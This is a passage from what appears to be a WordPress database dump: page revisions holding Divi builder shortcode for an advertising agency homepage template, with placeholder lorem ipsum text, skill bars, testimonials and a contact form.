src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" email=\"dhiraj@wthtest1.in8.cdn-alpha.com\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 20:05:59','2020-07-08 20:05:59','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(275,1,'2020-07-08 20:15:11','2020-07-08 20:15:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" 